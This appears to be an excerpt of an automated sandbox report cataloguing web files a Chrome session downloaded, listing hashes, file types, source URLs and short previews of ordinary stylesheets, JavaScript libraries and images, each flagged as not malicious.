                                                                                        Preview:......Exif..II*.................Ducky.......<.....0http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:131BA49B3A7711EE907B9B6F142EAC6B" xmpMM:InstanceID="xmp.iid:131BA49A3A7711EE907B9B6F142EAC6B" xmp:CreatorTool="Adobe Photoshop 2022 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6DFD410835CB11EEA1D3C6FD030C0EF2" stRef:documentID="xmp.did:6DFD410935CB11EEA1D3C6FD030C0EF2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d............................................................................................................................
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with very long lines (1238)
                                                                                        Category:downloaded
                                                                                        Size (bytes):1239
                                                                                        Entropy (8bit):5.068464054671174
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                                                        SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                                                        SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                                                        SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                                                        Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (30837), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):31002
                                                                                        Entropy (8bit):4.746844113917954
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:4258BD5C7A06955B6DAE720A835FB7B2
                                                                                        SHA1:84DCEB26861254989C3AF1B57179432AD0513F9A
                                                                                        SHA-256:B139F243C33A32098B98FE104D2070F65662D47C93CBDEE9B80AC9EA4E060830
                                                                                        SHA-512:6302011ADFD12B0CC8D5B9D05E3B5FACE32491A02C800D7A1ACF03025DBFA0E4BD12DA5BB2D6899EF18F410CA3C98502865EFD135276CC49645C5EA9EAC31B02
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/css/font-awesome.min.css
                                                                                        Preview:/*!.. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome.. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License).. */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (29696), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):29698
                                                                                        Entropy (8bit):5.441132158995551
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:D5CBA13A3154DC0C60E622489C78A67A
                                                                                        SHA1:607E9DB33B09C27027E2F5182DFF44EDF185C9BA
                                                                                        SHA-256:85162CCFACC0019413758885D25F4927A26BF164AC3E2D891AF91DBF6B495C5C
                                                                                        SHA-512:A2FF83582F705C531765A7EC816B44F7408D6460EE4CF77C1A4DE8655D77931A575D82B42C96A2C8686E8F80EF12262F4B220A505F586CFB397BBBD2E8E8A4C8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/script/algolia/algolia.min.js?x=133595808793788415
                                                                                        Preview:function setSearchPageCheckboxes(n,t){if($(".algolia-filter-checkboxes").length){var i=[];$(".algolia-filter-checkboxes input[type=checkbox]").each(function(){$(this).attr("id")!="USSTA"&&$(this).attr("id")!="CAPRO"&&(n=="ALL"?i.push($(this)):$(this).attr("id").startsWith(n)&&i.push($(this)))});i.length&&(uncheckAllBoxes(),i.forEach(function(n){n.prop("checked",!0)}));t&&multiHelper.search()}}function setSelectedSearchCountry(n){var t=n.attr("data-value"),i=n.find("img").clone()[0];$(".selectedSearchCountry span").empty().append(i).append(" "+t);autocompleteQueryFilter=t!="ALL"?"ReportCountry:"+t:"";localStorage.setItem("SearchCountryPreference",t)}function uncheckAllBoxes(){$("#US").prop("checked",!1);$("#USSTA").prop("checked",!1);$("#AU").prop("checked",!1);$("#AUCOM").prop("checked",!1);$("#STAPROECO").prop("checked",!1);$("#USCOMBENCH").prop("checked",!1);$("#UK").prop("checked",!1);$("#CA").prop("checked",!1);$("#CAPRO").prop("checked",!1);$("#CN").prop("checked",!1);$("#DE").pro
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                        Category:downloaded
                                                                                        Size (bytes):5338
                                                                                        Entropy (8bit):7.957190984273673
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:421302EE1C288588E1946B329B6E6E6C
                                                                                        SHA1:89D79DC70EB0FE4365730B15188960825E01130D
                                                                                        SHA-256:77449A4D2A640160048BE5055345C3A3CE1C7AAF475B31A28D23CFA570596979
                                                                                        SHA-512:B6FE2D736F6B470914FEEEE0D388BDFC0EC9D16504437AE59A87BCF1AC3A7F8AA348EA63847BDC9424DED652C425CFA94344B4F8186C118DDF98552EF99F6350
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn4image.com/creatives/670/346/192_2_1710858046374.webp
                                                                                        Preview:RIFF....WEBPVP8X..............ALPH......$.."I.m.....8b..x..+A$#...).......2L.....f.xER....nf.?.s53..kE...l.6 `.....th...r,.\..Dx_..M..Z`..R5m...Z`.r.Y1*...F....U+hl...../C....Y..........5..t.4R...|... .C.G......~+T.Px........$?....O.....P.]K~..3..d..X.......,...d..'.Q......!.B...ulniKZ.mr..)f....L.@..f.r`P..F..D.....*..R.AV....h.$...?..f.2.*...i.....W.h..t.S:.Ij..{...4.P.|.... .7.\.S.k.'[.......u........y?.....t.../...zk...P}g......=+/+..^a........gD8a8@.O.W.f:..y...r.1.wSGb..z..=..F.a..........O.p~.......i..u].c.w...f...Q.Bc&\Bc......L.h..H.{...*..R...h.....4iEx."..r0RUx.c.....'....I.c.dg.....?..P..l9.2d.[hb%...6t.-H..O.....?.......~..d..2. *?_:....l]|".FI...l-|R.C..:..m.>..@IC[(-....{E...M.........h......... .V...RO.x.:..G.K=.....[n[js;..C[*.....\...../..rw..I....._.e...v.kn[r....o.+...*m.^.[6...R...f...w".*.S.n.;...>.._.....z..im........7o_.ru..o?..7Oo_.:[W.m.i.....Yu.7.g..1E...u^.....3.BMh....Wu.w.~e....k..XV....6.V..............=.7.;0n?.q..M.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (27982), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):92475
                                                                                        Entropy (8bit):5.127158082755615
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:EC5F42F3FABB06C32609EA8727EC652B
                                                                                        SHA1:A4C58DF3193766BBE10C04A51994048737D562C3
                                                                                        SHA-256:B6800CABF18BFCBFC4B3A28B24FEC696DA15B2F6226BE549CAEA77CA0CAB3985
                                                                                        SHA-512:D032518779036F74EC9690F5FB1CAEA4A27EEFD358A508242829A37ABB9E1E5AF0CDA9B5652D4AB51D19BCA3ED1F547FA6E3C30655D1F927FF8559C66355078B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/css/materialize.min.css
                                                                                        Preview:.materialize-red{background-color:#e51c23 !important}.materialize-red-text{color:#e51c23 !important}.materialize-red.lighten-5{background-color:#fdeaeb !important}.materialize-red-text.text-lighten-5{color:#fdeaeb !important}.materialize-red.lighten-4{background-color:#f8c1c3 !important}.materialize-red-text.text-lighten-4{color:#f8c1c3 !important}.materialize-red.lighten-3{background-color:#f3989b !important}.materialize-red-text.text-lighten-3{color:#f3989b !important}.materialize-red.lighten-2{background-color:#ee6e73 !important}.materialize-red-text.text-lighten-2{color:#ee6e73 !important}.materialize-red.lighten-1{background-color:#ea454b !important}.materialize-red-text.text-lighten-1{color:#ea454b !important}.materialize-red.darken-1{background-color:#d0181e !important}.materialize-red-text.text-darken-1{color:#d0181e !important}.materialize-red.darken-2{background-color:#b9151b !important}.materialize-red-text.text-darken-2{color:#b9151b !important}.materialize-red.darken-3{bac
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):4594
                                                                                        Entropy (8bit):4.749911397571929
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:933283E6991B27391F59CEF1BA49BA9C
                                                                                        SHA1:05E0D513404C3051E4FAB97E1DE00CA66F117B33
                                                                                        SHA-256:8676C186C33D1C97BDA99626BC731EE073D45853806921E1C9FDB3257F7C1D7F
                                                                                        SHA-512:8BA1C51888E8106B7F6155E48BE05630BAEB1614ABC8591E51D7191E0473BD2DE365CAA3ADE32086FD06EC1DC1F0FCC75C7FBCDE111494A79D148A2C69E3F36B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/app/desktop/css02/tosPop.css
                                                                                        Preview:.app-benchmark {.. position: fixed;.. width: 98%;.. left: 0;.. bottom: 0;.. padding: 5px 1%;.. background-color: #CCC;.. color: #333;.. text-align: right..}...exitpop-content {.. position: fixed;.. height: 400px;.. width: 708px;.. margin: -200px 0 0 -354px;.. top: 50%;.. left: 50%;.. text-align: left;.. padding: 0;.. border: 0;.. z-index: 2147483647..}...exitpopup-overlay {.. background: rgba(0, 0, 0, .6);.. height: 100%;.. left: 0;.. position: fixed;.. top: 0;.. width: 100%;.. z-index: 2147483647;.. display: none..}...exitpop-content img {.. display: block;.. margin: 0 auto;.. position: relative;.. text-align: center;.. max-width: 100%;.. height: auto..}...exitpop-discountbar {.. background-color: red;.. border-bottom: 4px dashed #fff;.. color: #fff;.. font-family: Arial, Helvetica, sans-serif;.. font-size: 15px;.. font-weight: 700;.. height: 50px;.. line-height: 50p
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):1081
                                                                                        Entropy (8bit):4.9085727559861985
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:1686E79320E453DA9D8B560514FCA546
                                                                                        SHA1:C24936E96E7E3B7727DAD1D0DD9867B0F41E3D02
                                                                                        SHA-256:09BF7F1826F39E2F297C3F1EBA65B5A44E78E015B5C729D96B70C93C4FAD12CA
                                                                                        SHA-512:B069DCCC7BB50D7A744B58E2E9DE190CFF39708EB6CE04811809374DF6DEDBA469635667629D09EE50A2190B4C61D3DF15EC3F6EB7C0D43E588E2807FB483F58
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/app/desktop/css02/common.css
                                                                                        Preview:form {. padding: 0 !important;.}.input.has-error,.select.has-error {. background: url(../images/error-input.png) 99.5% 50% no-repeat #fff !important;. border: 1px solid orange !important;.}.input.no-error,.select.no-error {. background: url(../images/tick-input.png) 99.5% 50% no-repeat #fff !important;. border: 1px solid green !important;.}.#app_common_modal_close,.#error_handler_overlay_close {. line-height: 26px !important;.}..form-control::placeholder {. color: #0c0c0c !important;. font-size: 14px;.}..form-control::-webkit-input-placeholder {. color: #0c0c0c !important;. font-size: 14px;.}./* WebKit, Blink, Edge */..form-control:-moz-placeholder {. color: #0c0c0c !important;. font-size: 14px;.}./* Mozilla Firefox 4 to 18 */..form-control::-moz-placeholder {. color: #0c0c0c !important;. font-size: 14px;.}./* Mozilla Firefox 19+ */..form-control:-ms-input-placeholder {. color: #0c0c0c !important;. font-size: 14px;.}./* Internet Explorer
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65294), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):80427
                                                                                        Entropy (8bit):5.183840055206163
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:B70D61B244F8886800CD55491BE21F52
                                                                                        SHA1:108BF5B5E6E2BBB745354E715DE164DF57CD0960
                                                                                        SHA-256:F5AE8F599F28FB11AFFEA9A68B755B6B3F27D763500BEA6242919F1EF6B49389
                                                                                        SHA-512:C1F5CAD914B5A1FCE6C33B71AFA14728ABC7F86F60023AC1F02933E48C51A19BF218118F7AFD87BB69DDEA8664DCFB42EBFFB736349C809B8C57739CD05665EF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/bootstrap-5.3.0/js/bootstrap.bundle.min.js
                                                                                        Preview:/*!.. * Bootstrap v5.3.0 (https://getbootstrap.com/).. * Copyright 2011-2023 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors).. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */..!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t=new Map,e={set(e,i,n){t.has(e)||t.set(e,new Map);const s=t.get(e);s.has(i)||0===s.size?s.set(i,n):console.error(`Bootstrap doesn't allow more than one instance per element. Bound instance: ${Array.from(s.keys())[0]}.`)},get:(e,i)=>t.has(e)&&t.get(e).get(i)||null,remove(e,i){if(!t.has(e))return;const n=t.get(e);n.delete(i),0===n.size&&t.delete(e)}},i="transitionend",n=t=>(t&&window.CSS&&window.CSS.escape&&(t=t.replace(/#([^\s"#']+)/g,((t,e)=>`#${CSS.escape(e)}`))),t),s=t=>{t.dispatchEvent(new Event(i))},o=t=>!(!
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                        Category:downloaded
                                                                                        Size (bytes):2043
                                                                                        Entropy (8bit):7.274850125896946
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:43EF1AECBE81C550E7154790BFE53C2C
                                                                                        SHA1:CACEE2B052974C534AD2344EC6B21E54941F41A2
                                                                                        SHA-256:355076DABB5E17B8443D2AB2F8D33191CA2D2D5369207CDA364CE612D96E2CEC
                                                                                        SHA-512:CA7B8D5B273F4DEF83D386A5986B831ACE56A38237CA7AB30D67F3480FAB4CBB5851AB2DBBD59DE75324D52B487184F345EC288B545AB0B2195D2E33AFA33110
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/assets/images/ci33.jpg
                                                                                        Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:47187E208B7F11ED8B5AC9D2C083D36B" xmpMM:DocumentID="xmp.did:47187E218B7F11ED8B5AC9D2C083D36B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:47187E1E8B7F11ED8B5AC9D2C083D36B" stRef:documentID="xmp.did:47187E1F8B7F11ED8B5AC9D2C083D36B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):5641
                                                                                        Entropy (8bit):4.119363747860931
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:2F61C0B7455785B2B932348A13F258DA
                                                                                        SHA1:7356D8CF4901C7673A07BF779DB61F5B1B2C10E5
                                                                                        SHA-256:DAC199365D952B222A189B852BB6CF4257CBD55C5ABBA256752DA18189241C20
                                                                                        SHA-512:401C576F2F877EF0FA2BDE4338B0E5F254B84BD71C7261304B84A824813F62FA767E2C2320904B63C89D89560A39CC8B8DBAB6C763E84F56F6435F5D051EACC7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/img/flags/menu-flag-nz.svg
                                                                                        Preview:<svg width="17" height="12" viewBox="0 0 17 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M15.135 11.2413H1.53153C0.869721 11.2413 0.333252 10.7048 0.333252 10.043V1.95683C0.333252 1.29504 0.869721 0.758545 1.53153 0.758545H15.135C15.7968 0.758545 16.3333 1.29501 16.3333 1.95683V10.043C16.3333 10.7048 15.7968 11.2413 15.135 11.2413Z" fill="#41479B"/>..<path d="M0.609127 5.99992H1.08831L3.64363 4.32573V5.99992H5.02294V4.32573L7.57822 5.99992H8.05741C8.20978 5.99992 8.33328 5.87639 8.33328 5.72404V5.50523L6.14094 4.06889H8.33325V2.68958H6.14091L8.33325 1.25323V1.03442C8.33325 0.882076 8.20978 0.758545 8.05738 0.758545H7.57819L5.02288 2.43273V0.758545H3.64356V2.43273L1.17213 0.813482C0.883564 0.904107 0.642314 1.10108 0.493658 1.35829L2.52563 2.68958H0.333252V4.06889H2.5256L0.333252 5.50523V5.72404C0.333252 5.87639 0.456783 5.99992 0.609127 5.99992Z" fill="#F5F5F5"/>..<path d="M8.33325 2.96545H4.74703V0.758545H3.91947V2.96545H0.333252V3.79301H3.91947V5.99992H4.74703V3.7930
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8086), with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):8094
                                                                                        Entropy (8bit):5.101351448269664
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:AE5F47ACBE96CB0F6FD8DD4D56AEA43F
                                                                                        SHA1:1F650D628ED79791204CD4786072C7D4A5D8C2E2
                                                                                        SHA-256:A1E4D4F077E2537B3188BBEBF34B101A25071DEDA3C3B7290DF30F7E1703A048
                                                                                        SHA-512:C425F0A420E9EF26DB4255F0EC90451FDCBF8ACBDED77BFE0515859DFB2020E841F14F0718005DD641DAAB9237C840F218651EDB2689370FFAE606981FD41158
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/css/industry-now-header.min.css
                                                                                        Preview:.header{position:sticky;top:0;left:0;z-index:1001;background:#fff}.form-search-field{background:#fff;position:relative;margin-bottom:0;border-radius:100px;border-style:solid;box-shadow:none!important;padding:1px 18px;border:1px solid #cfd8dc;width:100%!important;display:inline-block}.selectedSearchCountry{position:absolute;left:20px;top:12px;min-width:80px;cursor:pointer;border-right:var(--gray-300-theme-color) 1px solid}.selectedSearchCountry span{vertical-align:top}.selectedSearchCountry:after{content:' ';background-image:url(/resources/img/ibis-icons/baseline-expand-more.svg);background-repeat:no-repeat;background-size:cover;display:inline-block;min-width:16px;min-height:16px;height:24px;width:24px;position:relative;margin-left:4px}.selectedSearchCountry img{vertical-align:middle;display:inline-block;margin-top:-3px}.selectedSearchCountry.noSelect{min-width:60px}.selectedSearchCountry.noSelect:after{display:none}.selectedSearchCountry.noSelect+.search-algolia-container{margin-left:7
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (37205), with NEL line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):97720
                                                                                        Entropy (8bit):5.424614427408367
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:4333EACAEB5929965824472006728627
                                                                                        SHA1:EBEE2D1B743A23F5019DA81D429619F53ACF4B84
                                                                                        SHA-256:4437C298118B749B08A859FE4CE95DB4DAA9070FA35DCD5AE7BA32B04D072C87
                                                                                        SHA-512:BEBC399CFD24718151B8365A4542244B55EBAC7F1C2E7D3E185097F5D5BBB1F243AEDF203F381B10E67D8CABE40E88CAB48FA2DBF391E7C3D15D2F7C2BD991E2
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn-cookieyes.com/client_data/e2e4072512935dad8f2f2461/script.js
                                                                                        Preview:!function(){var t={3241:function(){"document"in window.self&&((!("classList"in document.createElement("_"))||document.createElementNS&&!("classList"in document.createElementNS("http://www.w3.org/2000/svg","g")))&&function(t){"use strict";if("Element"in t){var e="classList",r=t.Element.prototype,n=Object,o=String.prototype.trim||function(){return this.replace(/^\s+|\s+$/g,"")},i=Array.prototype.indexOf||function(t){for(var e=0,r=this.length;e<r;e++)if(e in this&&this[e]===t)return e;return-1},a=function(t,e){this.name=t,this.code=DOMException[t],this.message=e},s=function(t,e){if(""===e)throw new a("SYNTAX_ERR","An invalid or illegal string was specified");if(/\s/.test(e))throw new a("INVALID_CHARACTER_ERR","String contains an invalid character");return i.call(t,e)},c=function(t){for(var e=o.call(t.getAttribute("class")||""),r=e?e.split(/\s+/):[],n=0,i=r.length;n<i;n++)this.push(r[n]);this._updateClassName=function(){t.setAttribute("class",this.toString())}},u=c.prototype=[],f=function(
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                        Category:dropped
                                                                                        Size (bytes):2071
                                                                                        Entropy (8bit):7.312278608842466
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:3442675C83A58579BA48BC52F9E5FCA2
                                                                                        SHA1:E6841AB69D75A07A6EF92A29258923FEBFEEDE59
                                                                                        SHA-256:017340E629175DBD707D31BE94C707731FE6F51BE004F85E3D50B960F34EA081
                                                                                        SHA-512:FC8B3B356F89604DE8806D202360CE31168C97AAA9290FAC5DFD1BBC9FE995F342A1571387CE0BB5D0DB6FB667CF0FEC09E890C45B62E2310961262C1A07223D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:7E0B438B8B7F11EDB7E9B8AB664386D1" xmpMM:DocumentID="xmp.did:7E0B438C8B7F11EDB7E9B8AB664386D1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7E0B43898B7F11EDB7E9B8AB664386D1" stRef:documentID="xmp.did:7E0B438A8B7F11EDB7E9B8AB664386D1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                        Category:downloaded
                                                                                        Size (bytes):6442
                                                                                        Entropy (8bit):7.964094092732919
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:FE3E3C35C203CD9C559BD3EEEE0AFADF
                                                                                        SHA1:E579BBB8A1CBFA50677CF6F09D5DC1EDDECD137A
                                                                                        SHA-256:D9F29DBD2CDD40EB8608980BB1F7822C4B292AC63EFF37A7964BAE6EFB602E24
                                                                                        SHA-512:5C8B1FDF8382E7AE0130DA8F14182B9BD2BCCB3488E8971A5E7712F62BF2F7AFE8833381ECA6E5A9FABEF222864DD84E9BDC9F2677C89D0C70DD3855C23AD7B6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn4image.com/creatives/670/346/192_4_1710858046374.webp
                                                                                        Preview:RIFF"...WEBPVP8X..............ALPH......G........$.*H....B....!Sg|.:.{.(....>.....z...7..J.L..ly.u.>....s....e[."|,(.JY)...[J...a-.&k1...me.Z[J..i.....<......F...X=.'.[......u5.b1..)km.}..U4.ki%.u.........ww....VF.B....s[.%t...LI...0.d08.u!.......s)m]..w..VeH.6.R......I.......a.D..d-.J..v.>.w-..[....gw8=.EtW"....~...a..........nV.l..+..'J.X..0.y:.....U..B........D...W..6....&.......q..g#z+.~u.e.I.Tk?.!.ZY4(.,.U..C..7U...-w....sH..)..U.......K../{..^:v|.[..}.).YP.../...5..M.y....T.9^..X....8./.iq.8x..].$e0...CU....R3..*.O.T...(........=......u...x...Y..... UJ....8..(...".n....h.].......VK.9..qp.N.....J......0.}..#.n.U.....PN..P3..}..s.).>p` "..[<..h.Q~..-q..W.@.-.!x....Z32.J=([.&.6..[.=\}F.Bic.6...V...A.pf......l.H...l.i......)...F.....|.........8....FBm}.5.<..K.....;...t..~4.g.A"%z..1...W.3..6q.,K.T6 .M.;f.s...W.X.2:.a....[..X...7..ntj....Cm.#.....}..VX..=....Y.@L..m....:.$4..:g6.....k.:.D.H.....(.Y...J%..Z.....E.H.!k..u).i. ..dh.*}...-
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                        Category:downloaded
                                                                                        Size (bytes):254
                                                                                        Entropy (8bit):5.731922202645482
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:FF9ACAEC2755534AC711B5D75F4B148D
                                                                                        SHA1:330526D80938B6852D1E7FF253D0DE85E2AF0C1A
                                                                                        SHA-256:00DF02930FD9CD13FF94D5675B886E20D94830ED0FFDA71A113E32ACEFF3BC91
                                                                                        SHA-512:0C16516EC252B5EA4A9D819062812D2F43EC0D0510A4CC81F9D99479D25F29F01FA8B81A66791CCBA836CA6DA544136364F6D0F6B99BDA281AE6AB961A764289
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn4image.com/creatives/668/790/360_0_1710672900497.webp
                                                                                        Preview:RIFF....WEBPVP8X........g.....ALPH..............VP8 .........*h...>1..D.!.... ....p........NC.l....9.}.r..d.=...{...'!.NC.l....9.}.r..d.=...{...'!.NC.l....9.}.r..d.=...{...'!.NC.l....9.}.r..d.=...{...'!.NC.l....9.}.r..d.=...................
